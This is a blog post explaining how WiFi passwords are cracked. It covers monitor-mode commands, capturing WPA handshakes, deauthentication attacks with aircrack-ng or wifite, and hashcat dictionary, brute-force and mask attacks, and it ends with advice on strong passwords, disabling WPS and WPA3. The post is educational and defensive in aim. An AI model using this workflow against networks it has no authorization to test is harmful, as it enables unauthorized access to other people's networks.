Responsive Navbar Refined

How Easy Is It to Crack a WiFi Password?

by William Downing | October 03, 2024

How Easy Is It to Crack a WiFi Password?

One of the tools I've added to my cybersecurity toolbox is penetration testing, which is the art of penetrating a network's defenses — not for the purpose of exploiting data or other malicious intentions, but to check its integral security and offer recommendations to strengthen its defenses.

My journey down this rabbit hole started with one question: "Just how easy and feasible would it be to hack someone's WiFi anyway?"

Today, I want to answer that question and introduce you to the world of WiFi penetration testing. It is certainly not the only type of penetration testing, but it is a great starting point for anyone who wants to learn more about cybersecurity, networks, or how the internet actually operates on a fundamental level.

It will take some time to gather the necessary skills, as it requires a deep technical knowledge of how networks work and how information is dispersed over wireless access points. You may also need to purchase some additional equipment. However, this knowledge is attainable for anyone with the motivation to pursue it.

Tools and Equipment

The first thing you will need to hack a WiFi access point is a tool capable of capturing and injecting packets. Packets are the small pieces of data that float around us virtually all the time in the modern world. When packets are combined, they form the important pieces of information that fuel our lives. Everything from our Facebook login information to that funny meme you want to send is passed from one device to another via packets.

What can capture and inject packets? In most cases, a computer can do this. Most notably, a laptop, but a desktop with wireless connectivity may also suffice. However, not all network cards are created equal in this regard. Only some are capable of both packet capture and injection; others may only capture packets, and some may not perform either function. If your network card can capture packets, it will have the ability to enter "monitor mode." Windows does not support monitor mode natively, so using a Linux system is recommended for this task.

On Linux, you can enable monitor mode with commands like:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

There are also other programs which can be installed on Linux to simplify the process even further.

Alternative Devices

Computers are not the only way to capture packets. There are several smaller devices that can do this as well. The Flipper Zero, for example, is probably the most well-known device in this category, but not necessarily the best. A Flipper Zero on its own will not get the job done. You'll need to attach a Marauder WiFi board to it to gain the capability to capture and inject packets. Flippers are not traditionally used in WiFi hacking, as a laptop with a WiFi adaptor capable of monitor mode is the preferred method of attack. However, their ease of use and portability make them worth consideration.

Flipper Zero with a Marauder WiFi Board
A Flipper Zero with a Marauder WiFi Board attached

Capturing Packets

Once you've determined that your computer or other equipment can capture and inject packets, the next step is to actually do so. Several programs can capture packets. Wireshark is a famous example. When you enter monitor mode on your computer and start Wireshark, you can track all the packets around your computer in real-time. However, Wireshark itself cannot inject packets, although it can get the first part of the job done.

To crack a WiFi password, you'll first need to capture a series of packets containing the 4-way handshake that access points use to authorize devices onto their network. If you're passively capturing packets with Wireshark, you might eventually capture a handshake, especially in a high-traffic area. This is referred to as a passive attack.

For a more targeted approach, you'll need to perform an active attack, such as a deauthentication (deauth) attack. This involves injecting packets into an access point to force it to deauthenticate the devices on the network. When the devices reconnect, you can capture the handshakes. Programs like aircrack-ng or wifite can facilitate these attacks if your computer supports both packet capture and injection.

Cracking the Password

After capturing the WiFi handshake, you can verify it with Wireshark to ensure you have all four packets. However, you're not done yet. The handshake doesn't reveal the password directly; instead, it contains a hashed version of the password. A hash is the output of a cryptographic algorithm that turns your password into a garbled mess in transit, so people can't just snatch your personal details out of thin air.

To crack the hash, you'll use a tool like hashcat. Hashcat can run on Linux and Windows and is capable of checking the hash against a massive list of passwords (dictionary attack), every conceivable combination of passwords (brute force attack), a combination of both (hybrid attack), and more.

Cracking rig with 8 GPUs
An example of a cracking rig — This Computer has 8 x 48 GBs of GPU Processing Power

Estimating Time to Crack

To give you an idea of how long this could take, consider my GPU with 12 GB of memory, which can run about 3 billion hashes per hour. While this may seem like a lot, it really isn't if you use a strong, random password. For example, my ISP assigns a random password of 12 digits to each of its modems. This results in one trillion possible combinations, which would take about three days of continuous GPU operation to crack. This is roughly the same amount of time it would take to crack an 8-digit random password of characters.

If the attacker has access to a computer with several GPUs linked together, those days can shrink to hours or even minutes with enough power. While it is unlikely that anyone but the most dedicated and professional hacker would have such a computer, in the modern era, even this hurdle can be overcome. There are a plethora of services out there that mask themselves as "advanced password recovery services" that, for a fee, can use their computational power to crack your captured hash for you.

That is if you're using a brute force attack to check every conceivable combination. If the victim has a weak password, it can be checked against a list of common passwords, referred to as a dictionary. Very weak passwords such as "password123" or "12345678" can be cracked in seconds as they will feature highly in any dictionary. The bottom line is that the best defense is a strong and random password as it will stop all but the most motivated of attacks.

Password Strength

Unfortunately, we don't usually stick to such random passwords. We have patterns, and as just mentioned, there are password lists called dictionaries with billions of entries that a basic computer can check against in a few hours. Not only that, programs like hashcat allow you to set rules based on known patterns. For example, if you suspect a company's WiFi password could be its name followed by a few characters, you could configure the attack to test the company's name against every possible combination of six random characters (mask attack). Thus vastly decreasing the time needed to successfully crack a password.

Additional Considerations

There are some miscellaneous considerations I have before concluding. First, if you have an older modem or one with WPS (Wi-Fi Protected Setup) enabled, you should replace it as they are considerably more vulnerable. While not as common anymore, as WPS usage declined rapidly in the mid-2010s once its vulnerabilities were discovered, it's worth checking if you have WPS enabled, as it may be turned on without your knowledge. In 2024, there is no benefit to having WPS turned on. WPS is vulnerable to a variety of offline attacks that I won't list here as they are becoming outdated. The important thing to remember is that these attacks can be done far quicker and without the need for a powerful computer to crack hashes. All you need to do to protect yourself against these attacks is to turn WPS off.

On the flip side, the attacks we discussed are becoming obsolete, albeit at a slower rate, as the vulnerabilities we discussed only apply to WPA/WPA2 networks. In 2018, WPA3 was introduced with a bevy of new security protocols and protections. As of writing, though, WPA3 is not very widely used by individuals. It is much more common to see businesses transition to WPA3 networks as they generally need more advanced protection. WPA3, for example, makes deauthentication attacks impossible and increases the difficulty of capturing a handshake by increasing the computational power required.

Conclusion

So, how easy is it to hack someone's WiFi? It depends primarily on the strength of the password. For the average person, cracking a random password is doable but not ideal and requires significant motivation. Cracking a weak password, however, is a simple affair.

This is good news for those willing to put in the effort to create and memorize strong passwords. In my decade in law enforcement, I've learned something important about the nature of criminals. Most people imagine criminals as panthers, stealthily stalking their prey and attacking at just the right time. This is not the case, however. They are more like crocodiles, sitting by the watering hole waiting for the low-hanging fruit to fall into their mouths. They put in the least amount of effort and risk to attain their goals. Don't be low-hanging fruit. Keep a strong password and avoid the overwhelming majority of nasty surprises.